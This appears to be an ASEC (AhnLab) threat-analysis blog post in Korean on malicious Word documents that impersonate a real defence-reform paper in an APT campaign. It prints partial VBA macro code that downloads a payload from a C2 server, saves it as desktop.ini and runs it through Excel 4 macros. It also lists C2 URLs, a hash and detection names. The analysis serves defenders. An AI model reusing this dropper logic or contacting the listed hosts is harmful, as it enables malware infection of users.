ASEC 분석팀은 지난 9월 특정 논문을 이용한 악성 워드 문서가 유포됨을 확인하였다. 확인된 파일은 “경영혁신이론으로 본 국방개혁의 방향.doc” 명으로 유포되고 있으며 내부에 악성 매크로가 포함되어있다. 내부 매크로 코드는 기존 공유되었던 아래의 파일들과 유사한 형태로 모두 동일한 공격자의 소행으로 추정된다.
- 사례비지급 의뢰서(양식).doc (6월 9일 ASEC블로그)
- [** 하계학술대회]_양력.doc (6월 30일 ASEC블로그)
- 경영혁신이론으로 본 국방개혁의 방향.doc (9/15)
- 2 중국의 대외정책과 미중관계 전망_정상기.dotm (9/19)
- 극동문제연구소 나우만 재단 학술회의 기획안_발송용 (10/12)
9월 유포가 확인된 워드 문서의 내용은 실제 <경영혁신이론으로 본 국방개혁의 방향: 군 구조 및 전력체계 개혁을 중심으로> 논문과 동일한 내용으로 구성되어있다. 해당 논문은 이전 ‘북한 연관 그룹 추정 PDF 문서를 이용한 APT 공격’ 게시글에서 언급된 ‘05_64-1 정연봉경영혁신이론으로 본 국방개혁의 방향수정.pdf’ 와 동일한 파일명인것으로 미루어보아 해당 공격자가 동일한 논문으로 다양한 형태의 악성코드를 제작하는 것으로 보인다.
파일 실행 시 내부에 포함된 악성 매크로가 실행되며, 해당 매크로 코드는 ‘하계학술대회 약력 서식파일로 위장한 워드 악성코드 유포 중’ 게시글에서 소개한 악성 워드 문서의 매크로와 동일하다. 최근 확인된 ‘경영혁신이론으로 본 국방개혁의 방향.doc’ 워드 파일에 존재하는 매크로 코드는 아래와 같다.
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End Function
<중략>
Sub AutoOpen()
On Error Resume Next
asfwqfasfsdafas
qazwsx = 0
ujmikl
End Sub
Function ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<중략>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[base64로 인코딩된 C2 주소]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
Set ExcelApp = CreateObject("Excel.Application")
str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi") // call("kernel32", "WinExec", "JFJ", "wscript //e:vbscript //b ""
str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
ini = Replace(ini, "\", "\\")
cmd = str9 + ini + str11
api = ExcelApp.ExecuteExcel4Macro(cmd)
Sleep 2000
DeleteFileA ini
End If
qazwsx = 1
End If
End Function
매크로 코드 내부에는 Base64로 인코딩된 C2 주소가 존재한다. 경영혁신이론으로 본 국방개혁의 방향.doc 파일에서는 hxxp://n4028chu.mywebcommunity.org/d.php에 접속하여 받아온 데이터를 %APPDATA%\desktop.ini 파일에 저장 및 실행한다.
해당 유형의 악성코드는 아래와 같이 다양한 파일명으로 유포되고 있다.
- 2 중국의 대외정책과 미중관계 전망_정상기.dotm (9/19)
- 극동문제연구소 나우만 재단 학술회의 기획안_발송용 (10/12)
위 파일들 모두 동일한 악성 매크로를 포함하고 있으며, 아래와 같이 ‘경영혁신이론으로 본 국방개혁의 방향.doc’ 의 매크로 코드에 키 입력에 의해 행위가 발현될 수 있도록 하는 코드가 추가된 워드 문서도 존재한다. 추가된 코드 이외에 변수명, 함수명 등은 모두 동일하다.
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End Function
<중략>
Function ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<중략>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[base64로 인코딩된 C2 주소]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
<중략>
Sub FLL()
Selection.TypeText Text:="a"
ujmikl
End Sub
Sub G9W()
Selection.TypeText Text:="b"
ujmikl
End Sub
Sub GEA()
Selection.TypeText Text:="c"
ujmikl
End Sub
<생략>아래는 동일한 매크로를 포함하여 유포되는 악성 워드 문서에서 확인된 C2 주소이다.
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
위와 같이 악성 워드 문서를 이용한 공격은 꾸준히 이루어지고 있다. 해당 유형의 악성 문서는 파일 내부에 실제 논문의 내용 등을 포함하고 있어사용자가 악성 파일 임을 인지하기 어렵기 때문에 각별한 주의가 필요하다. 출처가 불분명한 파일은 실행을 자제하고 매크로 실행을 지양해야한다.
현재 V3에서는 해당 악성코드를 아래와 같이 탐지 중이다.
[파일 진단]
- Downloader/DOC.Agent
- Downloader/DOC.Generic.S1677
[IOC]
- 5eb09dd7aafdd5af5a8396497f99e0e7
- hxxp://n4028chu.mywebcommunity.org/d.php
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
[관련 게시글]
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] VBS 코드를 실행하여 공격자 C&C 서버와 통신하는 방식은 기존 ASEC 블로그(특정 논문의 악성 워드 문서를 이용한 APT 공격)를 통해 소개한 내용과 […]